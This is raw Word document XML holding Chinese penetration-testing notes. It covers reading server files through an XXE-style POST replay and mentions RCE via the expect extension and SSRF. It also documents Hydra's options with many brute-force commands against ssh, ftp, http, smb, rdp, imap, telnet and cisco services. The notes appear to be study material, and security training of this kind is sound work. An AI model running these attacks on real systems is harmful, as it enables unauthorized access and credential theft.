            <wp:extent cx="5319939" cy="4435155"/>
            <wp:effectExtent l="0" t="0" r="0" b="3810"/>
            <wp:docPr id="4" name="图片 4" descr="http://images2015.cnblogs.com/blog/1161231/201705/1161231-20170524110013810-1662473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1161231/201705/1161231-20170524110013810-166247348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24" cy="444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0" w:rsidRPr="00384A4D" w:rsidRDefault="00E23570" w:rsidP="00E23570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384A4D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把我们的POST数据包复制上去，然后Replay，就可以获取C://pass.txt，内容：ONDragon'Password啦。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E23570" w:rsidRPr="00E23570" w:rsidRDefault="00E23570" w:rsidP="0000682A">
      <w:pPr>
        <w:widowControl/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="150" w:after="150"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="MS Shell Dlg" w:eastAsia="宋体" w:hAnsi="MS Shell Dlg" w:cs="MS Shell Dlg"/>
          <w:color w:val="555555"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E23570">
        <w:rPr>
          <w:rFonts w:ascii="MS Shell Dlg" w:eastAsia="宋体" w:hAnsi="MS Shell Dlg" w:cs="MS Shell Dlg"/>
          <w:noProof/>
          <w:color w:val="555555"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3E01561B" wp14:editId="54510E5E">
            <wp:extent cx="2066290" cy="1323975"/>
            <wp:effectExtent l="0" t="0" r="0" b="9525"/>
            <wp:docPr id="3" name="图片 3" descr="http://images2015.cnblogs.com/blog/1161231/201705/1161231-20170524110220435-1680511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2015.cnblogs.com/blog/1161231/201705/1161231-20170524110220435-168051116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0" w:rsidRPr="00384A4D" w:rsidRDefault="00E23570" w:rsidP="00384A4D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384A4D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可以看到利用它，可以查看服务器上的文件。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E23570" w:rsidRPr="00384A4D" w:rsidRDefault="00E23570" w:rsidP="00384A4D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384A4D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命令执行得需要服务器有一个expect扩展插件，如果按照此插件，就可以进行远程命令执行。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E23570" w:rsidRPr="00384A4D" w:rsidRDefault="00E23570" w:rsidP="00384A4D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45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  <w:r w:rsidRPr="00384A4D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此外还可以进行类似SSRF的攻击，内网信息收集，端口扫描等等。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00622AD1" w:rsidRDefault="00252646" w:rsidP="00252646">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:bookmarkStart w:id="40" w:name="_信息泄露"/>
      <w:bookmarkStart w:id="41" w:name="_Toc489789722"/>
      <w:bookmarkEnd w:id="40"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>信息泄露</w:t>
      </w:r>
      <w:bookmarkEnd w:id="41"/>
    </w:p>
    <w:p w:rsidR="004E2C9A" w:rsidRDefault="004E2C9A" w:rsidP="004E2C9A">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:bookmarkStart w:id="42" w:name="_目录遍历"/>
      <w:bookmarkStart w:id="43" w:name="_Toc489789723"/>
      <w:bookmarkEnd w:id="42"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>目录遍历</w:t>
      </w:r>
      <w:bookmarkEnd w:id="43"/>
    </w:p>
    <w:p w:rsidR="004E2C9A" w:rsidRDefault="004E2C9A" w:rsidP="004E2C9A">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:bookmarkStart w:id="44" w:name="_命令执行"/>
      <w:bookmarkStart w:id="45" w:name="_Toc489789724"/>
      <w:bookmarkEnd w:id="44"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>命令执行</w:t>
      </w:r>
      <w:bookmarkEnd w:id="45"/>
    </w:p>
    <w:p w:rsidR="00FB0785" w:rsidRPr="00FB0785" w:rsidRDefault="00FB0785" w:rsidP="00FB0785">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:bookmarkStart w:id="46" w:name="_文件包含"/>
      <w:bookmarkStart w:id="47" w:name="_Toc489789725"/>
      <w:bookmarkEnd w:id="46"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>文件包含</w:t>
      </w:r>
      <w:bookmarkEnd w:id="47"/>
    </w:p>
    <w:p w:rsidR="0007740F" w:rsidRPr="003B3A99" w:rsidRDefault="0007740F" w:rsidP="0081257C">
      <w:pPr>
        <w:ind w:firstLine="420"/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</w:pPr>
    </w:p>
    <w:p w:rsidR="005620AD" w:rsidRDefault="005620AD" w:rsidP="005620AD"/>
    <w:p w:rsidR="005620AD" w:rsidRPr="00004FA5" w:rsidRDefault="005620AD" w:rsidP="005620AD"/>
    <w:p w:rsidR="001053E3" w:rsidRDefault="001053E3" w:rsidP="001053E3">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:bookmarkStart w:id="48" w:name="_逻辑漏洞"/>
      <w:bookmarkStart w:id="49" w:name="_Toc489789726"/>
      <w:bookmarkEnd w:id="48"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>逻辑漏洞</w:t>
      </w:r>
      <w:bookmarkEnd w:id="49"/>
    </w:p>
    <w:p w:rsidR="002773BB" w:rsidRPr="002773BB" w:rsidRDefault="002773BB" w:rsidP="002773BB">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:bookmarkStart w:id="50" w:name="_越权漏洞"/>
      <w:bookmarkStart w:id="51" w:name="_Toc489789727"/>
      <w:bookmarkEnd w:id="50"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>越权漏洞</w:t>
      </w:r>
      <w:bookmarkEnd w:id="51"/>
    </w:p>
    <w:p w:rsidR="00B359DC" w:rsidRDefault="00F12B6A" w:rsidP="00B359DC">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:bookmarkStart w:id="52" w:name="_暴力破解"/>
      <w:bookmarkStart w:id="53" w:name="_Toc489789728"/>
      <w:bookmarkEnd w:id="52"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>暴力破解</w:t>
      </w:r>
      <w:bookmarkEnd w:id="53"/>
    </w:p>
    <w:p w:rsidR="00317ACD" w:rsidRDefault="00317ACD" w:rsidP="00317ACD">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:bookmarkStart w:id="54" w:name="_Toc489789729"/>
      <w:r>
        <w:t>H</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>ydra</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>使用</w:t>
      </w:r>
      <w:bookmarkEnd w:id="54"/>
    </w:p>
    <w:p w:rsidR="00314E55" w:rsidRDefault="00314E55" w:rsidP="003233AA">
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
        <w:ind w:left="1620"/>
        <w:rPr>
          <w:rFonts w:eastAsia="宋体"/>
          <w:sz w:val="42"/>
          <w:szCs w:val="42"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="MS Shell Dlg" w:hAnsi="MS Shell Dlg" w:cs="MS Shell Dlg"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="555555"/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>Options:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00314E55" w:rsidRPr="009B2D75" w:rsidRDefault="00314E55" w:rsidP="003233AA">
      <w:pPr>
        <w:pStyle w:val="Heading5"/>
        <w:rPr>
          <w:sz w:val="15"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003233AA">
        <w:rPr>
          <w:rStyle w:val="Heading5Char"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>-R</w:t>
      </w:r>
      <w:r w:rsidRPr="003233AA">
        <w:rPr>
          <w:rStyle w:val="Heading5Char"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="009B2D75">
        <w:t>继续从上一次进度接着破解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S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大写，采用</w:t>
      </w:r>
      <w:r w:rsidRPr="009B2D75">
        <w:rPr>
          <w:rFonts w:ascii="MS Shell Dlg" w:hAnsi="MS Shell Dlg" w:cs="MS Shell Dlg"/>
          <w:color w:val="555555"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>SSL</w:t>
      </w:r>
      <w:r w:rsidRPr="009B2D75">
        <w:rPr>
          <w:rFonts w:ascii="MS Shell Dlg" w:hAnsi="MS Shell Dlg" w:cs="MS Shell Dlg"/>
          <w:color w:val="555555"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>链接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s &lt;PORT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小写，可通过这个参数指定非默认端口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l &lt;LOGIN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指定破解的用户，对特定用户破解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L &lt;FILE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指定用户名字典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p &lt;PASS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小写，指定密码破解，少用，一般是采用密码字典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P &lt;FILE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大写，指定密码字典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e &lt;ns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可选选项，</w:t>
      </w:r>
      <w:r w:rsidRPr="009B2D75">
        <w:rPr>
          <w:rFonts w:ascii="MS Shell Dlg" w:hAnsi="MS Shell Dlg" w:cs="MS Shell Dlg"/>
          <w:color w:val="555555"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>n</w:t>
      </w:r>
      <w:r w:rsidRPr="009B2D75">
        <w:rPr>
          <w:rFonts w:ascii="MS Shell Dlg" w:hAnsi="MS Shell Dlg" w:cs="MS Shell Dlg"/>
          <w:color w:val="555555"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>：空密码试探，</w:t>
      </w:r>
      <w:r w:rsidRPr="009B2D75">
        <w:rPr>
          <w:rFonts w:ascii="MS Shell Dlg" w:hAnsi="MS Shell Dlg" w:cs="MS Shell Dlg"/>
          <w:color w:val="555555"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>s</w:t>
      </w:r>
      <w:r w:rsidRPr="009B2D75">
        <w:rPr>
          <w:rFonts w:ascii="MS Shell Dlg" w:hAnsi="MS Shell Dlg" w:cs="MS Shell Dlg"/>
          <w:color w:val="555555"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>：使用指定用户和密码试探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C &lt;FILE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使用冒号分割格式，例如</w:t>
      </w:r>
      <w:r w:rsidRPr="009B2D75">
        <w:rPr>
          <w:rFonts w:ascii="MS Shell Dlg" w:hAnsi="MS Shell Dlg" w:cs="MS Shell Dlg"/>
          <w:color w:val="555555"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>“</w:t>
      </w:r>
      <w:r w:rsidRPr="009B2D75">
        <w:rPr>
          <w:rFonts w:ascii="MS Shell Dlg" w:hAnsi="MS Shell Dlg" w:cs="MS Shell Dlg"/>
          <w:color w:val="555555"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>登录名</w:t>
      </w:r>
      <w:r w:rsidRPr="009B2D75">
        <w:rPr>
          <w:rFonts w:ascii="MS Shell Dlg" w:hAnsi="MS Shell Dlg" w:cs="MS Shell Dlg"/>
          <w:color w:val="555555"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r w:rsidRPr="009B2D75">
        <w:rPr>
          <w:rFonts w:ascii="MS Shell Dlg" w:hAnsi="MS Shell Dlg" w:cs="MS Shell Dlg"/>
          <w:color w:val="555555"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>密码</w:t>
      </w:r>
      <w:r w:rsidRPr="009B2D75">
        <w:rPr>
          <w:rFonts w:ascii="MS Shell Dlg" w:hAnsi="MS Shell Dlg" w:cs="MS Shell Dlg"/>
          <w:color w:val="555555"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>”</w:t>
      </w:r>
      <w:r w:rsidRPr="009B2D75">
        <w:rPr>
          <w:rFonts w:ascii="MS Shell Dlg" w:hAnsi="MS Shell Dlg" w:cs="MS Shell Dlg"/>
          <w:color w:val="555555"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>来代替</w:t>
      </w:r>
      <w:r w:rsidRPr="009B2D75">
        <w:rPr>
          <w:rFonts w:ascii="MS Shell Dlg" w:hAnsi="MS Shell Dlg" w:cs="MS Shell Dlg"/>
          <w:color w:val="555555"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>-L/-P</w:t>
      </w:r>
      <w:r w:rsidRPr="009B2D75">
        <w:rPr>
          <w:rFonts w:ascii="MS Shell Dlg" w:hAnsi="MS Shell Dlg" w:cs="MS Shell Dlg"/>
          <w:color w:val="555555"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>参数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M &lt;FILE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指定目标列表文件一行一条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lastRenderedPageBreak/>
        <w:t>-o &lt;FILE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指定结果输出文件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f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在使用</w:t>
      </w:r>
      <w:r w:rsidRPr="009B2D75">
        <w:rPr>
          <w:rFonts w:ascii="MS Shell Dlg" w:hAnsi="MS Shell Dlg" w:cs="MS Shell Dlg"/>
          <w:color w:val="555555"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>-M</w:t>
      </w:r>
      <w:r w:rsidRPr="009B2D75">
        <w:rPr>
          <w:rFonts w:ascii="MS Shell Dlg" w:hAnsi="MS Shell Dlg" w:cs="MS Shell Dlg"/>
          <w:color w:val="555555"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>参数以后，找到第一对登录名或者密码的时候中止破解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t &lt;TASKS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同时运行的线程数，默认为</w:t>
      </w:r>
      <w:r w:rsidRPr="009B2D75">
        <w:rPr>
          <w:rFonts w:ascii="MS Shell Dlg" w:hAnsi="MS Shell Dlg" w:cs="MS Shell Dlg"/>
          <w:color w:val="555555"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>16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w &lt;TIME&gt;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设置最大超时的时间，单位秒，默认是</w:t>
      </w:r>
      <w:r w:rsidRPr="009B2D75">
        <w:rPr>
          <w:rFonts w:ascii="MS Shell Dlg" w:hAnsi="MS Shell Dlg" w:cs="MS Shell Dlg"/>
          <w:color w:val="555555"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>30s</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00314E55" w:rsidRPr="009B2D75" w:rsidRDefault="00314E55" w:rsidP="003233AA">
      <w:pPr>
        <w:pStyle w:val="Heading5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</w:rPr>
        <w:t>-v / -V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</w:rPr>
        <w:t>显示详细过程</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00314E55" w:rsidRPr="009B2D75" w:rsidRDefault="00314E55" w:rsidP="00314E55">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="150" w:beforeAutospacing="0" w:after="150" w:afterAutospacing="0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Style w:val="Strong"/>
          <w:rFonts w:ascii="MS Shell Dlg" w:hAnsi="MS Shell Dlg" w:cs="MS Shell Dlg"/>
          <w:color w:val="555555"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>server</w:t>
      </w:r>
      <w:r w:rsidRPr="009B2D75">
        <w:rPr>
          <w:rFonts w:ascii="MS Shell Dlg" w:hAnsi="MS Shell Dlg" w:cs="MS Shell Dlg"/>
          <w:color w:val="555555"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:br w:type="textWrapping" w:clear="all"/>
      </w:r>
      <w:r w:rsidRPr="009B2D75">
        <w:rPr>
          <w:rFonts w:ascii="MS Shell Dlg" w:hAnsi="MS Shell Dlg" w:cs="MS Shell Dlg"/>
          <w:color w:val="555555"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>目标</w:t>
      </w:r>
      <w:r w:rsidRPr="009B2D75">
        <w:rPr>
          <w:rFonts w:ascii="MS Shell Dlg" w:hAnsi="MS Shell Dlg" w:cs="MS Shell Dlg"/>
          <w:color w:val="555555"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>ip</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00314E55" w:rsidRPr="009B2D75" w:rsidRDefault="00314E55" w:rsidP="00314E55">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="150" w:beforeAutospacing="0" w:after="150" w:afterAutospacing="0"/>
        <w:rPr>
          <w:rFonts w:ascii="MS Shell Dlg" w:hAnsi="MS Shell Dlg" w:cs="MS Shell Dlg"/>
          <w:color w:val="555555"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0080430D">
        <w:rPr>
          <w:rStyle w:val="Heading5Char"/>
        </w:rPr>
        <w:t>service</w:t>
      </w:r>
      <w:r w:rsidRPr="0080430D">
        <w:rPr>
          <w:rStyle w:val="Heading5Char"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="009B2D75">
        <w:rPr>
          <w:rFonts w:ascii="MS Shell Dlg" w:hAnsi="MS Shell Dlg" w:cs="MS Shell Dlg"/>
          <w:color w:val="555555"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>指定服务名，支持的服务和协议：</w:t>
      </w:r>
      <w:r w:rsidRPr="009B2D75">
        <w:rPr>
          <w:rFonts w:ascii="MS Shell Dlg" w:hAnsi="MS Shell Dlg" w:cs="MS Shell Dlg"/>
          <w:color w:val="555555"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>telnet ftp pop3[-ntlm] imap[-ntlm] smb smbnt http[s]-{head|get} http-{get|post}-form http-proxy cisco cisco-enable vnc ldap2 ldap3 mssql mysql oracle-listener postgres nntp socks5 rexec rlogin pcnfs snmp rsh cvs svn icq sapr3 ssh2 smtp-auth[-ntlm] pcanywhere teamspeak sip vmauthd firebird ncp afp</w:t>
      </w:r>
      <w:r w:rsidRPr="009B2D75">
        <w:rPr>
          <w:rFonts w:ascii="MS Shell Dlg" w:hAnsi="MS Shell Dlg" w:cs="MS Shell Dlg"/>
          <w:color w:val="555555"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>等等</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00314E55" w:rsidRPr="009B2D75" w:rsidRDefault="00314E55" w:rsidP="00464CE0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ssh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2"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009B2D75">
        <w:rPr>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">hydra -L users.txt -P password.txt -t </w:t>
      </w:r>
      <w:r w:rsidRPr="009B2D75">
        <w:rPr>
          <w:color w:val="800080"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>1</w:t>
      </w:r>
      <w:r w:rsidRPr="009B2D75">
        <w:rPr>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> -vV -e ns </w:t>
      </w:r>
      <w:r w:rsidRPr="009B2D75">
        <w:rPr>
          <w:color w:val="800080"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>192.168</w:t>
      </w:r>
      <w:r w:rsidRPr="009B2D75">
        <w:rPr>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidRPr="009B2D75">
        <w:rPr>
          <w:color w:val="800080"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>1.104</w:t>
      </w:r>
      <w:r w:rsidRPr="009B2D75">
        <w:rPr>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> ssh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 xml:space="preserve">hydra -L users.txt -P password.txt -t </w:t>
      </w:r>
      <w:r w:rsidRPr="009B2D75">
        <w:rPr>
          <w:color w:val="800080"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>1</w:t>
      </w:r>
      <w:r w:rsidRPr="009B2D75">
        <w:rPr>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> -vV -e ns -o save.log </w:t>
      </w:r>
      <w:r w:rsidRPr="009B2D75">
        <w:rPr>
          <w:color w:val="800080"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>192.168</w:t>
      </w:r>
      <w:r w:rsidRPr="009B2D75">
        <w:rPr>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidRPr="009B2D75">
        <w:rPr>
          <w:color w:val="800080"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>1.104</w:t>
      </w:r>
      <w:r w:rsidRPr="009B2D75">
        <w:rPr>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> ssh  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00314E55" w:rsidRPr="009B2D75" w:rsidRDefault="00314E55" w:rsidP="00464CE0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ftp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hydra ip ftp -l 用户名 -P 密码字典 -t 线程(默认16) -vV</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00314E55" w:rsidRPr="00464CE0" w:rsidRDefault="00314E55" w:rsidP="00464CE0">
      <w:pPr>
        <w:pStyle w:val="Heading5"/>
      </w:pPr>
      <w:r w:rsidRPr="00464CE0">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Get</w:t>
      </w:r>
      <w:r w:rsidRPr="00464CE0">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
        </w:rPr>
        <w:t>提交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2"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009B2D75">
        <w:rPr>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>hydra -l 用户名 -p 密码字典 -t 线程 -vV -e ns ip http-</w:t>
      </w:r>
      <w:r w:rsidRPr="009B2D75">
        <w:rPr>
          <w:color w:val="0000FF"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>get</w:t>
      </w:r>
      <w:r w:rsidRPr="009B2D75">
        <w:rPr>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> /admin/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hydra -l 用户名 -p 密码字典 -t 线程 -vV -e ns -f ip http-</w:t>
      </w:r>
      <w:r w:rsidRPr="009B2D75">
        <w:rPr>
          <w:color w:val="0000FF"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>get</w:t>
      </w:r>
      <w:r w:rsidRPr="009B2D75">
        <w:rPr>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> /admin/index.php</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00314E55" w:rsidRPr="009B2D75" w:rsidRDefault="00314E55" w:rsidP="00464CE0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https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# hydra -m /index.php -l muts -P pass.txt 10.36.16.18 https</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00314E55" w:rsidRPr="009B2D75" w:rsidRDefault="00314E55" w:rsidP="003249B7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teamspeak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# hydra -l 用户名 -P 密码字典 -s 端口号 -vV ip teamspeak</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00314E55" w:rsidRPr="009B2D75" w:rsidRDefault="00314E55" w:rsidP="003249B7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cisco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2"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009B2D75">
        <w:rPr>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t># hydra -P pass.txt 10.36.16.18 cisco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# hydra -m cloud -P pass.txt 10.36.16.18 cisco-enable</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00314E55" w:rsidRPr="009B2D75" w:rsidRDefault="00314E55" w:rsidP="003249B7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smb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# hydra -l administrator -P pass.txt 10.36.16.18 smb</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00314E55" w:rsidRPr="009B2D75" w:rsidRDefault="00314E55" w:rsidP="003249B7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pop3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# hydra -l muts -P pass.txt my.pop3.mail pop3</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00314E55" w:rsidRPr="009B2D75" w:rsidRDefault="00314E55" w:rsidP="003249B7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rdp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# hydra ip rdp -l administrator -P pass.txt -V</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00314E55" w:rsidRPr="009B2D75" w:rsidRDefault="00314E55" w:rsidP="00AD1475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http-proxy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# hydra -l admin -P pass.txt http-proxy://10.36.16.18</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00314E55" w:rsidRPr="009B2D75" w:rsidRDefault="00314E55" w:rsidP="00AD1475">
      <w:pPr>
        <w:pStyle w:val="Heading5"/>
        <w:rPr>
          <w:sz w:val="15"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009B2D75">
        <w:lastRenderedPageBreak/>
        <w:t>破解</w:t>
      </w:r>
      <w:r w:rsidRPr="009B2D75">
        <w:t>imap</w:t>
      </w:r>
      <w:r w:rsidRPr="009B2D75">
        <w:t>：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2"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009B2D75">
        <w:rPr>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t># hydra -L user.txt -p secret 10.36.16.18 imap PLAIN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# hydra -C defaults.txt -6 imap://[fe80::2c:31ff:fe12:ac11]:143/PLAIN</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00314E55" w:rsidRPr="009B2D75" w:rsidRDefault="00314E55" w:rsidP="00AD1475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telnet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># hydra ip telnet -l 用户 -P 密码字典 -t 32 -s 23 -e ns -f -V</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00314E55" w:rsidRPr="009B2D75" w:rsidRDefault="00314E55" w:rsidP="00AD1475">
      <w:pPr>
        <w:pStyle w:val="Heading5"/>
        <w:rPr>
          <w:sz w:val="15"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009B2D75">
        <w:t>破解</w:t>
      </w:r>
      <w:r w:rsidRPr="009B2D75">
        <w:t>POST</w:t>
      </w:r>
      <w:r w:rsidRPr="009B2D75">
        <w:t>表单</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00314E55" w:rsidRPr="009B2D75" w:rsidRDefault="00314E55" w:rsidP="00314E55">
      <w:pPr>
        <w:pStyle w:val="HTMLPreformatted"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="17"/>
        </w:numPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F5F5F5"/>
        <w:tabs>
          <w:tab w:val="clear" w:pos="720"/>
        </w:tabs>
        <w:ind w:left="450"/>
        <w:rPr>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009B2D75">
        <w:rPr>
          <w:color w:val="0000FF"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>&lt;</w:t>
      </w:r>
      <w:r w:rsidRPr="009B2D75">
        <w:rPr>
          <w:color w:val="800000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">form </w:t>
      </w:r>
      <w:r w:rsidRPr="009B2D75">
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>action</w:t>
      </w:r>
      <w:r w:rsidRPr="009B2D75">
        <w:rPr>
          <w:color w:val="0000FF"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>="index.php"</w:t>
      </w:r>
      <w:r w:rsidRPr="009B2D75">
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:sz w:val="22"/>
